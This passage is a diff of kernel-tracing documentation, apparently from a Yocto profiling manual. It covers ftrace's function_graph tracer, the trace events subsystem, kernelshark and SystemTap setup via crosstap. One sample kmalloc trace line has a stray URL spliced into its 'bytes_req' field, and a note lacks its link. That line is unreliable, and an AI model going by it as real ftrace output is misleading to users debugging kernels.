+.. admonition:: Tying it Together
+
+ The ftrace function tracer is also available from within perf, as the
+ ftrace:function tracepoint.
+
+It is a little more difficult to follow the call chains than it needs to
+be - luckily there's a variant of the function tracer that displays the
+callchains explicitly, called the 'function_graph' tracer: ::
+
+ root@sugarbay:/sys/kernel/debug/tracing# echo function_graph > current_tracer
+ root@sugarbay:/sys/kernel/debug/tracing# cat trace | less
+
+ tracer: function_graph
+
+ CPU DURATION FUNCTION CALLS
+ | | | | | | |
+ 7) 0.046 us | pick_next_task_fair();
+ 7) 0.043 us | pick_next_task_stop();
+ 7) 0.042 us | pick_next_task_rt();
+ 7) 0.032 us | pick_next_task_fair();
+ 7) 0.030 us | pick_next_task_idle();
+ 7) | _raw_spin_unlock_irq() {
+ 7) 0.033 us | sub_preempt_count();
+ 7) 0.258 us | }
+ 7) 0.032 us | sub_preempt_count();
+ 7) + 13.341 us | } /* __schedule */
+ 7) 0.095 us | } /* sub_preempt_count */
+ 7) | schedule() {
+ 7) | __schedule() {
+ 7) 0.060 us | add_preempt_count();
+ 7) 0.044 us | rcu_note_context_switch();
+ 7) | _raw_spin_lock_irq() {
+ 7) 0.033 us | add_preempt_count();
+ 7) 0.247 us | }
+ 7) | idle_balance() {
+ 7) | _raw_spin_unlock() {
+ 7) 0.031 us | sub_preempt_count();
+ 7) 0.246 us | }
+ 7) | update_shares() {
+ 7) 0.030 us | __rcu_read_lock();
+ 7) 0.029 us | __rcu_read_unlock();
+ 7) 0.484 us | }
+ 7) 0.030 us | __rcu_read_lock();
+ 7) | load_balance() {
+ 7) | find_busiest_group() {
+ 7) 0.031 us | idle_cpu();
+ 7) 0.029 us | idle_cpu();
+ 7) 0.035 us | idle_cpu();
+ 7) 0.906 us | }
+ 7) 1.141 us | }
+ 7) 0.022 us | msecs_to_jiffies();
+ 7) | load_balance() {
+ 7) | find_busiest_group() {
+ 7) 0.031 us | idle_cpu();
+ .
+ .
+ .
+ 4) 0.062 us | msecs_to_jiffies();
+ 4) 0.062 us | __rcu_read_unlock();
+ 4) | _raw_spin_lock() {
+ 4) 0.073 us | add_preempt_count();
+ 4) 0.562 us | }
+ 4) + 17.452 us | }
+ 4) 0.108 us | put_prev_task_fair();
+ 4) 0.102 us | pick_next_task_fair();
+ 4) 0.084 us | pick_next_task_stop();
+ 4) 0.075 us | pick_next_task_rt();
+ 4) 0.062 us | pick_next_task_fair();
+ 4) 0.066 us | pick_next_task_idle();
+ ------------------------------------------
+ 4) kworker-74 => <idle>-0
+ ------------------------------------------
+
+ 4) | finish_task_switch() {
+ 4) | _raw_spin_unlock_irq() {
+ 4) 0.100 us | sub_preempt_count();
+ 4) 0.582 us | }
+ 4) 1.105 us | }
+ 4) 0.088 us | sub_preempt_count();
+ 4) ! 100.066 us | }
+ .
+ .
+ .
+ 3) | sys_ioctl() {
+ 3) 0.083 us | fget_light();
+ 3) | security_file_ioctl() {
+ 3) 0.066 us | cap_file_ioctl();
+ 3) 0.562 us | }
+ 3) | do_vfs_ioctl() {
+ 3) | drm_ioctl() {
+ 3) 0.075 us | drm_ut_debug_printk();
+ 3) | i915_gem_pwrite_ioctl() {
+ 3) | i915_mutex_lock_interruptible() {
+ 3) 0.070 us | mutex_lock_interruptible();
+ 3) 0.570 us | }
+ 3) | drm_gem_object_lookup() {
+ 3) | _raw_spin_lock() {
+ 3) 0.080 us | add_preempt_count();
+ 3) 0.620 us | }
+ 3) | _raw_spin_unlock() {
+ 3) 0.085 us | sub_preempt_count();
+ 3) 0.562 us | }
+ 3) 2.149 us | }
+ 3) 0.133 us | i915_gem_object_pin();
+ 3) | i915_gem_object_set_to_gtt_domain() {
+ 3) 0.065 us | i915_gem_object_flush_gpu_write_domain();
+ 3) 0.065 us | i915_gem_object_wait_rendering();
+ 3) 0.062 us | i915_gem_object_flush_cpu_write_domain();
+ 3) 1.612 us | }
+ 3) | i915_gem_object_put_fence() {
+ 3) 0.097 us | i915_gem_object_flush_fence.constprop.36();
+ 3) 0.645 us | }
+ 3) 0.070 us | add_preempt_count();
+ 3) 0.070 us | sub_preempt_count();
+ 3) 0.073 us | i915_gem_object_unpin();
+ 3) 0.068 us | mutex_unlock();
+ 3) 9.924 us | }
+ 3) + 11.236 us | }
+ 3) + 11.770 us | }
+ 3) + 13.784 us | }
+ 3) | sys_ioctl() {
+
+As you can see, the function_graph display is much easier
+to follow. Also note that in addition to the function calls and
+associated braces, other events such as scheduler events are displayed
+in context. In fact, you can freely include any tracepoint available in
+the trace events subsystem described in the next section by simply
+enabling those events, and they'll appear in context in the function
+graph display. Quite a powerful tool for understanding kernel dynamics.
+
+Also notice that there are various annotations on the left hand side of
+the display. For example if the total time it took for a given function
+to execute is above a certain threshold, an exclamation point or plus
+sign appears on the left hand side. Please see the ftrace documentation
+for details on all these fields.
+
+The 'trace events' Subsystem
+----------------------------
+
+One especially important directory contained within the
+/sys/kernel/debug/tracing directory is the 'events' subdirectory, which
+contains representations of every tracepoint in the system. Listing out
+the contents of the 'events' subdirectory, we see mainly another set of
+subdirectories: ::
+
+ root@sugarbay:/sys/kernel/debug/tracing# cd events
+ root@sugarbay:/sys/kernel/debug/tracing/events# ls -al
+ drwxr-xr-x 38 root root 0 Nov 14 23:19 .
+ drwxr-xr-x 5 root root 0 Nov 14 23:19 ..
+ drwxr-xr-x 19 root root 0 Nov 14 23:19 block
+ drwxr-xr-x 32 root root 0 Nov 14 23:19 btrfs
+ drwxr-xr-x 5 root root 0 Nov 14 23:19 drm
+ -rw-r--r-- 1 root root 0 Nov 14 23:19 enable
+ drwxr-xr-x 40 root root 0 Nov 14 23:19 ext3
+ drwxr-xr-x 79 root root 0 Nov 14 23:19 ext4
+ drwxr-xr-x 14 root root 0 Nov 14 23:19 ftrace
+ drwxr-xr-x 8 root root 0 Nov 14 23:19 hda
+ -r--r--r-- 1 root root 0 Nov 14 23:19 header_event
+ -r--r--r-- 1 root root 0 Nov 14 23:19 header_page
+ drwxr-xr-x 25 root root 0 Nov 14 23:19 i915
+ drwxr-xr-x 7 root root 0 Nov 14 23:19 irq
+ drwxr-xr-x 12 root root 0 Nov 14 23:19 jbd
+ drwxr-xr-x 14 root root 0 Nov 14 23:19 jbd2
+ drwxr-xr-x 14 root root 0 Nov 14 23:19 kmem
+ drwxr-xr-x 7 root root 0 Nov 14 23:19 module
+ drwxr-xr-x 3 root root 0 Nov 14 23:19 napi
+ drwxr-xr-x 6 root root 0 Nov 14 23:19 net
+ drwxr-xr-x 3 root root 0 Nov 14 23:19 oom
+ drwxr-xr-x 12 root root 0 Nov 14 23:19 power
+ drwxr-xr-x 3 root root 0 Nov 14 23:19 printk
+ drwxr-xr-x 8 root root 0 Nov 14 23:19 random
+ drwxr-xr-x 4 root root 0 Nov 14 23:19 raw_syscalls
+ drwxr-xr-x 3 root root 0 Nov 14 23:19 rcu
+ drwxr-xr-x 6 root root 0 Nov 14 23:19 rpm
+ drwxr-xr-x 20 root root 0 Nov 14 23:19 sched
+ drwxr-xr-x 7 root root 0 Nov 14 23:19 scsi
+ drwxr-xr-x 4 root root 0 Nov 14 23:19 signal
+ drwxr-xr-x 5 root root 0 Nov 14 23:19 skb
+ drwxr-xr-x 4 root root 0 Nov 14 23:19 sock
+ drwxr-xr-x 10 root root 0 Nov 14 23:19 sunrpc
+ drwxr-xr-x 538 root root 0 Nov 14 23:19 syscalls
+ drwxr-xr-x 4 root root 0 Nov 14 23:19 task
+ drwxr-xr-x 14 root root 0 Nov 14 23:19 timer
+ drwxr-xr-x 3 root root 0 Nov 14 23:19 udp
+ drwxr-xr-x 21 root root 0 Nov 14 23:19 vmscan
+ drwxr-xr-x 3 root root 0 Nov 14 23:19 vsyscall
+ drwxr-xr-x 6 root root 0 Nov 14 23:19 workqueue
+ drwxr-xr-x 26 root root 0 Nov 14 23:19 writeback
+
+Each one of these subdirectories
+corresponds to a 'subsystem' and contains yet again more subdirectories,
+each one of those finally corresponding to a tracepoint. For example,
+here are the contents of the 'kmem' subsystem: ::
+
+ root@sugarbay:/sys/kernel/debug/tracing/events# cd kmem
+ root@sugarbay:/sys/kernel/debug/tracing/events/kmem# ls -al
+ drwxr-xr-x 14 root root 0 Nov 14 23:19 .
+ drwxr-xr-x 38 root root 0 Nov 14 23:19 ..
+ -rw-r--r-- 1 root root 0 Nov 14 23:19 enable
+ -rw-r--r-- 1 root root 0 Nov 14 23:19 filter
+ drwxr-xr-x 2 root root 0 Nov 14 23:19 kfree
+ drwxr-xr-x 2 root root 0 Nov 14 23:19 kmalloc
+ drwxr-xr-x 2 root root 0 Nov 14 23:19 kmalloc_node
+ drwxr-xr-x 2 root root 0 Nov 14 23:19 kmem_cache_alloc
+ drwxr-xr-x 2 root root 0 Nov 14 23:19 kmem_cache_alloc_node
+ drwxr-xr-x 2 root root 0 Nov 14 23:19 kmem_cache_free
+ drwxr-xr-x 2 root root 0 Nov 14 23:19 mm_page_alloc
+ drwxr-xr-x 2 root root 0 Nov 14 23:19 mm_page_alloc_extfrag
+ drwxr-xr-x 2 root root 0 Nov 14 23:19 mm_page_alloc_zone_locked
+ drwxr-xr-x 2 root root 0 Nov 14 23:19 mm_page_free
+ drwxr-xr-x 2 root root 0 Nov 14 23:19 mm_page_free_batched
+ drwxr-xr-x 2 root root 0 Nov 14 23:19 mm_page_pcpu_drain
+
+Let's see what's inside the subdirectory for a
+specific tracepoint, in this case the one for kmalloc: ::
+
+ root@sugarbay:/sys/kernel/debug/tracing/events/kmem# cd kmalloc
+ root@sugarbay:/sys/kernel/debug/tracing/events/kmem/kmalloc# ls -al
+ drwxr-xr-x 2 root root 0 Nov 14 23:19 .
+ drwxr-xr-x 14 root root 0 Nov 14 23:19 ..
+ -rw-r--r-- 1 root root 0 Nov 14 23:19 enable
+ -rw-r--r-- 1 root root 0 Nov 14 23:19 filter
+ -r--r--r-- 1 root root 0 Nov 14 23:19 format
+ -r--r--r-- 1 root root 0 Nov 14 23:19 id
+
+The 'format' file for the
+tracepoint describes the event in memory, which is used by the various
+tracing tools that now make use of these tracepoint to parse the event
+and make sense of it, along with a 'print fmt' field that allows tools
+like ftrace to display the event as text. Here's what the format of the
+kmalloc event looks like: ::
+
+ root@sugarbay:/sys/kernel/debug/tracing/events/kmem/kmalloc# cat format
+ name: kmalloc
+ ID: 313
+ format:
+ field:unsigned short common_type; offset:0; size:2; signed:0;
+ field:unsigned char common_flags; offset:2; size:1; signed:0;
+ field:unsigned char common_preempt_count; offset:3; size:1; signed:0;
+ field:int common_pid; offset:4; size:4; signed:1;
+ field:int common_padding; offset:8; size:4; signed:1;
+
+ field:unsigned long call_site; offset:16; size:8; signed:0;
+ field:const void * ptr; offset:24; size:8; signed:0;
+ field:size_t bytes_req; offset:32; size:8; signed:0;
+ field:size_t bytes_alloc; offset:40; size:8; signed:0;
+ field:gfp_t gfp_flags; offset:48; size:4; signed:0;
+
+ print fmt: "call_site=%lx ptr=%p bytes_req=%zu bytes_alloc=%zu gfp_flags=%s", REC->call_site, REC->ptr, REC->bytes_req, REC->bytes_alloc,
+ (REC->gfp_flags) ? __print_flags(REC->gfp_flags, "|", {(unsigned long)(((( gfp_t)0x10u) | (( gfp_t)0x40u) | (( gfp_t)0x80u) | ((
+ gfp_t)0x20000u) | (( gfp_t)0x02u) | (( gfp_t)0x08u)) | (( gfp_t)0x4000u) | (( gfp_t)0x10000u) | (( gfp_t)0x1000u) | (( gfp_t)0x200u) | ((
+ gfp_t)0x400000u)), "GFP_TRANSHUGE"}, {(unsigned long)((( gfp_t)0x10u) | (( gfp_t)0x40u) | (( gfp_t)0x80u) | (( gfp_t)0x20000u) | ((
+ gfp_t)0x02u) | (( gfp_t)0x08u)), "GFP_HIGHUSER_MOVABLE"}, {(unsigned long)((( gfp_t)0x10u) | (( gfp_t)0x40u) | (( gfp_t)0x80u) | ((
+ gfp_t)0x20000u) | (( gfp_t)0x02u)), "GFP_HIGHUSER"}, {(unsigned long)((( gfp_t)0x10u) | (( gfp_t)0x40u) | (( gfp_t)0x80u) | ((
+ gfp_t)0x20000u)), "GFP_USER"}, {(unsigned long)((( gfp_t)0x10u) | (( gfp_t)0x40u) | (( gfp_t)0x80u) | (( gfp_t)0x80000u)), GFP_TEMPORARY"},
+ {(unsigned long)((( gfp_t)0x10u) | (( gfp_t)0x40u) | (( gfp_t)0x80u)), "GFP_KERNEL"}, {(unsigned long)((( gfp_t)0x10u) | (( gfp_t)0x40u)),
+ "GFP_NOFS"}, {(unsigned long)((( gfp_t)0x20u)), "GFP_ATOMIC"}, {(unsigned long)((( gfp_t)0x10u)), "GFP_NOIO"}, {(unsigned long)((
+ gfp_t)0x20u), "GFP_HIGH"}, {(unsigned long)(( gfp_t)0x10u), "GFP_WAIT"}, {(unsigned long)(( gfp_t)0x40u), "GFP_IO"}, {(unsigned long)((
+ gfp_t)0x100u), "GFP_COLD"}, {(unsigned long)(( gfp_t)0x200u), "GFP_NOWARN"}, {(unsigned long)(( gfp_t)0x400u), "GFP_REPEAT"}, {(unsigned
+ long)(( gfp_t)0x800u), "GFP_NOFAIL"}, {(unsigned long)(( gfp_t)0x1000u), "GFP_NORETRY"}, {(unsigned long)(( gfp_t)0x4000u), "GFP_COMP"},
+ {(unsigned long)(( gfp_t)0x8000u), "GFP_ZERO"}, {(unsigned long)(( gfp_t)0x10000u), "GFP_NOMEMALLOC"}, {(unsigned long)(( gfp_t)0x20000u),
+ "GFP_HARDWALL"}, {(unsigned long)(( gfp_t)0x40000u), "GFP_THISNODE"}, {(unsigned long)(( gfp_t)0x80000u), "GFP_RECLAIMABLE"}, {(unsigned
+ long)(( gfp_t)0x08u), "GFP_MOVABLE"}, {(unsigned long)(( gfp_t)0), "GFP_NOTRACK"}, {(unsigned long)(( gfp_t)0x400000u), "GFP_NO_KSWAPD"},
+ {(unsigned long)(( gfp_t)0x800000u), "GFP_OTHER_NODE"} ) : "GFP_NOWAIT"
+
+The 'enable' file
+in the tracepoint directory is what allows the user (or tools such as
+trace-cmd) to actually turn the tracepoint on and off. When enabled, the
+corresponding tracepoint will start appearing in the ftrace 'trace' file
+described previously. For example, this turns on the kmalloc tracepoint: ::
+
+ root@sugarbay:/sys/kernel/debug/tracing/events/kmem/kmalloc# echo 1 > enable
+
+At the moment, we're not interested in the function tracer or
+some other tracer that might be in effect, so we first turn it off, but
+if we do that, we still need to turn tracing on in order to see the
+events in the output buffer: ::
+
+ root@sugarbay:/sys/kernel/debug/tracing# echo nop > current_tracer
+ root@sugarbay:/sys/kernel/debug/tracing# echo 1 > tracing_on
+
+Now, if we look at the the 'trace' file, we see nothing
+but the kmalloc events we just turned on: ::
+
+ root@sugarbay:/sys/kernel/debug/tracing# cat trace | less
+ # tracer: nop
+ #
+ # entries-in-buffer/entries-written: 1897/1897 #P:8
+ #
+ # _-----=> irqs-off
+ # / _----=> need-resched
+ # | / _---=> hardirq/softirq
+ # || / _--=> preempt-depth
+ # ||| / delay
+ # TASK-PID CPU# |||| TIMESTAMP FUNCTION
+ # | | | |||| | |
+ dropbear-1465 [000] ...1 18154.620753: kmalloc: call_site=ffffffff816650d4 ptr=ffff8800729c3000 bytes_req=2048 bytes_alloc=2048 gfp_flags=GFP_KERNEL
+ <idle>-0 [000] ..s3 18154.621640: kmalloc: call_site=ffffffff81619b36 ptr=ffff88006d555800 bytes_req=512 bytes_alloc=512 gfp_flags=GFP_ATOMIC
+ <idle>-0 [000] ..s3 18154.621656: kmalloc: call_site=ffffffff81619b36 ptr=ffff88006d555800 bytes_req=512 bytes_alloc=512 gfp_flags=GFP_ATOMIC
+ matchbox-termin-1361 [001] ...1 18154.755472: kmalloc: call_site=ffffffff81614050 ptr=ffff88006d5f0e00 bytes_req=512 bytes_alloc=512 gfp_flags=GFP_KERNEL|GFP_REPEAT
+ Xorg-1264 [002] ...1 18154.755581: kmalloc: call_site=ffffffff8141abe8 ptr=ffff8800734f4cc0 bytes_req=168 bytes_alloc=192 gfp_flags=GFP_KERNEL|GFP_NOWARN|GFP_NORETRY
+ Xorg-1264 [002] ...1 18154.755583: kmalloc: call_site=ffffffff814192a3 ptr=ffff88001f822520 bytes_req=24 bytes_alloc=32 gfp_flags=GFP_KERNEL|GFP_ZERO
+ Xorg-1264 [002] ...1 18154.755589: kmalloc: call_site=ffffffff81419edb ptr=ffff8800721a2f00 bytes_req=64 bytes_alloc=64 gfp_flags=GFP_KERNEL|GFP_ZERO
+ matchbox-termin-1361 [001] ...1 18155.354594: kmalloc: call_site=ffffffff81614050 ptr=ffff88006db35400 bytes_req=576 bytes_alloc=1024 gfp_flags=GFP_KERNEL|GFP_REPEAT
+ Xorg-1264 [002] ...1 18155.354703: kmalloc: call_site=ffffffff8141abe8 ptr=ffff8800734f4cc0 bytes_req=168 bytes_alloc=192 gfp_flags=GFP_KERNEL|GFP_NOWARN|GFP_NORETRY
+ Xorg-1264 [002] ...1 18155.354705: kmalloc: call_site=ffffffff814192a3 ptr=ffff88001f822520 bytes_req=24 bytes_alloc=32 gfp_flags=GFP_KERNEL|GFP_ZERO
+ Xorg-1264 [002] ...1 18155.354711: kmalloc: call_site=ffffffff81419edb ptr=ffff8800721a2f00 bytes_req=64 bytes_alloc=64 gfp_flags=GFP_KERNEL|GFP_ZERO
+ <idle>-0 [000] ..s3 18155.673319: kmalloc: call_site=ffffffff81619b36 ptr=ffff88006d555800 bytes_req=512 bytes_alloc=512 gfp_flags=GFP_ATOMIC
+ dropbear-1465 [000] ...1 18155.673525: kmalloc: call_site=ffffffff816650d4 ptr=ffff8800729c3000 bytes_req=2048 bytes_alloc=2048 gfp_flags=GFP_KERNEL
+ <idle>-0 [000] ..s3 18155.674821: kmalloc: call_site=ffffffff81619b36 ptr=ffff88006d554800 bytes_req=512 bytes_alloc=512 gfp_flags=GFP_ATOMIC
+ <idle>-0 [000] ..s3 18155.793014: kmalloc: call_site=ffffffff81619b36 ptr=ffff88006d554800 bytes_req=512 bytes_alloc=512 gfp_flags=GFP_ATOMIC
+ dropbear-1465 [000] ...1 18155.793219: kmalloc: call_site=ffffffff816650d4 ptr=ffff8800729c3000 bytes_req=2048 bytes_alloc=2048 gfp_flags=GFP_KERNEL
+ <idle>-0 [000] ..s3 18155.794147: kmalloc: call_site=ffffffff81619b36 ptr=ffff88006d555800 bytes_req=512 bytes_alloc=512 gfp_flags=GFP_ATOMIC
+ <idle>-0 [000] ..s3 18155.936705: kmalloc: call_site=ffffffff81619b36 ptr=ffff88006d555800 bytes_req=512 bytes_alloc=512 gfp_flags=GFP_ATOMIC
+ dropbear-1465 [000] ...1 18155.936910: kmalloc: call_site=ffffffff816650d4 ptr=ffff8800729c3000 bytes_req=2048 bytes_alloc=2048 gfp_flags=GFP_KERNEL
+ <idle>-0 [000] ..s3 18155.937869: kmalloc: call_site=ffffffff81619b36 ptr=ffff88006d554800 bytes_req=512 bytes_alloc=512 gfp_flags=GFP_ATOMIC
+ matchbox-termin-1361 [001] ...1 18155.953667: kmalloc: call_site=ffffffff81614050 ptr=ffff88006d5f2000 bytes_req=512 bytes_alloc=512 gfp_flags=GFP_KERNEL|GFP_REPEAT
+ Xorg-1264 [002] ...1 18155.953775: kmalloc: call_site=ffffffff8141abe8 ptr=ffff8800734f4cc0 bytes_req=168 bytes_alloc=192 gfp_flags=GFP_KERNEL|GFP_NOWARN|GFP_NORETRY
+ Xorg-1264 [002] ...1 18155.953777: kmalloc: call_site=ffffffff814192a3 ptr=ffff88001f822520 bytes_req=24 bytes_alloc=32 gfp_flags=GFP_KERNEL|GFP_ZERO
+ Xorg-1264 [002] ...1 18155.953783: kmalloc: call_site=ffffffff81419edb ptr=ffff8800721a2f00 bytes_req=64 bytes_alloc=64 gfp_flags=GFP_KERNEL|GFP_ZERO
+ <idle>-0 [000] ..s3 18156.176053: kmalloc: call_site=ffffffff81619b36 ptr=ffff88006d554800 bytes_req=512 bytes_alloc=512 gfp_flags=GFP_ATOMIC
+ dropbear-1465 [000] ...1 18156.176257: kmalloc: call_site=ffffffff816650d4 ptr=ffff8800729c3000 bytes_req=2048 bytes_alloc=2048 gfp_flags=GFP_KERNEL
+ <idle>-0 [000] ..s3 18156.177717: kmalloc: call_site=ffffffff81619b36 ptr=ffff88006d555800 bytes_req=512 bytes_alloc=512 gfp_flags=GFP_ATOMIC
+ <idle>-0 [000] ..s3 18156.399229: kmalloc: call_site=ffffffff81619b36 ptr=ffff88006d555800 bytes_req=512 bytes_alloc=512 gfp_flags=GFP_ATOMIC
+ dropbear-1465 [000] ...1 18156.399434: kmalloc: call_site=ffffffff816650d4 ptr=ffff8800729c3000 bytes_http://rostedt.homelinux.com/kernelshark/req=2048 bytes_alloc=2048 gfp_flags=GFP_KERNEL
+ <idle>-0 [000] ..s3 18156.400660: kmalloc: call_site=ffffffff81619b36 ptr=ffff88006d554800 bytes_req=512 bytes_alloc=512 gfp_flags=GFP_ATOMIC
+ matchbox-termin-1361 [001] ...1 18156.552800: kmalloc: call_site=ffffffff81614050 ptr=ffff88006db34800 bytes_req=576 bytes_alloc=1024 gfp_flags=GFP_KERNEL|GFP_REPEAT
+
+To again disable the kmalloc event, we need to send 0 to the enable file: ::
+
+ root@sugarbay:/sys/kernel/debug/tracing/events/kmem/kmalloc# echo 0 > enable
+
+You can enable any number of events or complete subsystems (by
+using the 'enable' file in the subsystem directory) and get an
+arbitrarily fine-grained idea of what's going on in the system by
+enabling as many of the appropriate tracepoints as applicable.
+
+A number of the tools described in this HOWTO do just that, including
+trace-cmd and kernelshark in the next section.
+
+.. admonition:: Tying it Together
+
+ These tracepoints and their representation are used not only by
+ ftrace, but by many of the other tools covered in this document and
+ they form a central point of integration for the various tracers
+ available in Linux. They form a central part of the instrumentation
+ for the following tools: perf, lttng, ftrace, blktrace and SystemTap
+
+.. admonition:: Tying it Together
+
+ Eventually all the special-purpose tracers currently available in
+ /sys/kernel/debug/tracing will be removed and replaced with
+ equivalent tracers based on the 'trace events' subsystem.
+
+.. _trace-cmd-kernelshark:
+
+trace-cmd/kernelshark
+---------------------
+
+trace-cmd is essentially an extensive command-line 'wrapper' interface
+that hides the details of all the individual files in
+/sys/kernel/debug/tracing, allowing users to specify specific particular
+events within the /sys/kernel/debug/tracing/events/ subdirectory and to
+collect traces and avoid having to deal with those details directly.
+
+As yet another layer on top of that, kernelshark provides a GUI that
+allows users to start and stop traces and specify sets of events using
+an intuitive interface, and view the output as both trace events and as
+a per-CPU graphical display. It directly uses 'trace-cmd' as the
+plumbing that accomplishes all that underneath the covers (and actually
+displays the trace-cmd command it uses, as we'll see).
+
+To start a trace using kernelshark, first start kernelshark: ::
+
+ root@sugarbay:~# kernelshark
+
+Then bring up the 'Capture' dialog by
+choosing from the kernelshark menu: ::
+
+ Capture | Record
+
+That will display the following dialog, which allows you to choose one or more
+events (or even one or more complete subsystems) to trace:
+
+.. image:: figures/kernelshark-choose-events.png
+ :align: center
+
+Note that these are exactly the same sets of events described in the
+previous trace events subsystem section, and in fact is where trace-cmd
+gets them for kernelshark.
+
+In the above screenshot, we've decided to explore the graphics subsystem
+a bit and so have chosen to trace all the tracepoints contained within
+the 'i915' and 'drm' subsystems.
+
+After doing that, we can start and stop the trace using the 'Run' and
+'Stop' button on the lower right corner of the dialog (the same button
+will turn into the 'Stop' button after the trace has started):
+
+.. image:: figures/kernelshark-output-display.png
+ :align: center
+
+Notice that the right-hand pane shows the exact trace-cmd command-line
+that's used to run the trace, along with the results of the trace-cmd
+run.
+
+Once the 'Stop' button is pressed, the graphical view magically fills up
+with a colorful per-cpu display of the trace data, along with the
+detailed event listing below that:
+
+.. image:: figures/kernelshark-i915-display.png
+ :align: center
+
+Here's another example, this time a display resulting from tracing 'all
+events':
+
+.. image:: figures/kernelshark-all.png
+ :align: center
+
+The tool is pretty self-explanatory, but for more detailed information
+on navigating through the data, see the `kernelshark
+website <https://kernelshark.org/Documentation.html>`__.
+
+.. _ftrace-documentation:
+
+ftrace Documentation
+--------------------
+
+The documentation for ftrace can be found in the kernel Documentation
+directory: ::
+
+ Documentation/trace/ftrace.txt
+
+The documentation for the trace event subsystem can also be found in the kernel
+Documentation directory: ::
+
+ Documentation/trace/events.txt
+
+There is a nice series of articles on using ftrace and trace-cmd at LWN:
+
+- `Debugging the kernel using Ftrace - part
+ 1 <http://lwn.net/Articles/365835/>`__
+
+- `Debugging the kernel using Ftrace - part
+ 2 <http://lwn.net/Articles/366796/>`__
+
+- `Secrets of the Ftrace function
+ tracer <http://lwn.net/Articles/370423/>`__
+
+- `trace-cmd: A front-end for
+ Ftrace <https://lwn.net/Articles/410200/>`__
+
+See also `KernelShark's documentation <https://kernelshark.org/Documentation.html>`__
+for further usage details.
+
+An amusing yet useful README (a tracing mini-HOWTO) can be found in
+``/sys/kernel/debug/tracing/README``.
+
+.. _profile-manual-systemtap:
+
+systemtap
+=========
+
+SystemTap is a system-wide script-based tracing and profiling tool.
+
+SystemTap scripts are C-like programs that are executed in the kernel to
+gather/print/aggregate data extracted from the context they end up being
+invoked under.
+
+For example, this probe from the `SystemTap
+tutorial <http://sourceware.org/systemtap/tutorial/>`__ simply prints a
+line every time any process on the system open()s a file. For each line,
+it prints the executable name of the program that opened the file, along
+with its PID, and the name of the file it opened (or tried to open),
+which it extracts from the open syscall's argstr.
+
+.. code-block:: none
+
+ probe syscall.open
+ {
+ printf ("%s(%d) open (%s)\n", execname(), pid(), argstr)
+ }
+
+ probe timer.ms(4000) # after 4 seconds
+ {
+ exit ()
+ }
+
+Normally, to execute this
+probe, you'd simply install systemtap on the system you want to probe,
+and directly run the probe on that system e.g. assuming the name of the
+file containing the above text is trace_open.stp: ::
+
+ # stap trace_open.stp
+
+What systemtap does under the covers to run this probe is 1) parse and
+convert the probe to an equivalent 'C' form, 2) compile the 'C' form
+into a kernel module, 3) insert the module into the kernel, which arms
+it, and 4) collect the data generated by the probe and display it to the
+user.
+
+In order to accomplish steps 1 and 2, the 'stap' program needs access to
+the kernel build system that produced the kernel that the probed system
+is running. In the case of a typical embedded system (the 'target'), the
+kernel build system unfortunately isn't typically part of the image
+running on the target. It is normally available on the 'host' system
+that produced the target image however; in such cases, steps 1 and 2 are
+executed on the host system, and steps 3 and 4 are executed on the
+target system, using only the systemtap 'runtime'.
+
+The systemtap support in Yocto assumes that only steps 3 and 4 are run
+on the target; it is possible to do everything on the target, but this
+section assumes only the typical embedded use-case.
+
+So basically what you need to do in order to run a systemtap script on
+the target is to 1) on the host system, compile the probe into a kernel
+module that makes sense to the target, 2) copy the module onto the
+target system and 3) insert the module into the target kernel, which
+arms it, and 4) collect the data generated by the probe and display it
+to the user.
+
+.. _systemtap-setup:
+
+systemtap Setup
+---------------
+
+Those are a lot of steps and a lot of details, but fortunately Yocto
+includes a script called 'crosstap' that will take care of those
+details, allowing you to simply execute a systemtap script on the remote
+target, with arguments if necessary.
+
+In order to do this from a remote host, however, you need to have access
+to the build for the image you booted. The 'crosstap' script provides
+details on how to do this if you run the script on the host without
+having done a build: ::
+
+ $ crosstap root@192.168.1.88 trace_open.stp
+
+ Error: No target kernel build found.
+ Did you forget to create a local build of your image?
+
+ 'crosstap' requires a local sdk build of the target system
+ (or a build that includes 'tools-profile') in order to build
+ kernel modules that can probe the target system.
+
+ Practically speaking, that means you need to do the following:
+ - If you're running a pre-built image, download the release
+ and/or BSP tarballs used to build the image.
+ - If you're working from git sources, just clone the metadata
+ and BSP layers needed to build the image you'll be booting.
+ - Make sure you're properly set up to build a new image (see
+ the BSP README and/or the widely available basic documentation
+ that discusses how to build images).
+ - Build an -sdk version of the image e.g.:
+ $ bitbake core-image-sato-sdk
+ OR
+ - Build a non-sdk image but include the profiling tools:
+ [ edit local.conf and add 'tools-profile' to the end of
+ the EXTRA_IMAGE_FEATURES variable ]
+ $ bitbake core-image-sato
+
+ Once you've build the image on the host system, you're ready to
+ boot it (or the equivalent pre-built image) and use 'crosstap'
+ to probe it (you need to source the environment as usual first):
+
+ $ source oe-init-build-env
+ $ cd ~/my/systemtap/scripts
+ $ crosstap root@192.168.1.xxx myscript.stp
+
+.. note::
+
+ SystemTap, which uses 'crosstap', assumes you can establish an ssh
+ connection to the remote target. Please refer to the crosstap wiki
+ page for details on verifying ssh connections at
+ . Also, the ability to ssh into the target system is not enabled by
+ default in \*-minimal images.
+
+So essentially what you need to
+do is build an SDK image or image with 'tools-profile' as detailed in
+the ":ref:`profile-manual/profile-manual-intro:General Setup`" section of this
+manual, and boot the resulting target image.
+
+.. note::
+
+ If you have a build directory containing multiple machines, you need
+ to have the MACHINE you're connecting to selected in local.conf, and
+ the kernel in that machine's build directory must match the kernel on
+ the booted system exactly, or you'll get the above 'crosstap' message
+ when you try to invoke a script.
+
+Running a Script on a Target
+----------------------------
+
+Once you've done that, you should be able to run a systemtap script on
+the target: ::
+
+ $ cd /path/to/yocto
+ $ source oe-init-build-env
+
+ ### Shell environment set up for builds. ###
+
+ You can now run 'bitbake <target>'
+
+ Common targets are:
+ core-image-minimal
+ core-image-sato
+ meta-toolchain
+ meta-ide-support
+
+ You can also run generated qemu images with a command like 'runqemu qemux86-64'
+
+Once you've done that, you can cd to whatever
+directory contains your scripts and use 'crosstap' to run the script: ::
+
+ $ cd /path/to/my/systemap/script
+ $ crosstap root@192.168.7.2 trace_open.stp
+
+If you get an error connecting to the target e.g.: ::
+
+ $ crosstap root@192.168.7.2 trace_open.stp
+ error establishing ssh connection on remote 'root@192.168.7.2'
+
+Try ssh'ing to the target and see what happens: ::
+
+ $ ssh root@192.168.7.2
+
+A lot of the time, connection
+problems are due specifying a wrong IP address or having a 'host key
+verification error'.
+
+If everything worked as planned, you should see something like this
+(enter the password when prompted, or press enter if it's set up to use
+no password):
+
+.. code-block:: none
+
+ $ crosstap root@192.168.7.2 trace_open.stp
+ root@192.168.7.2's password:
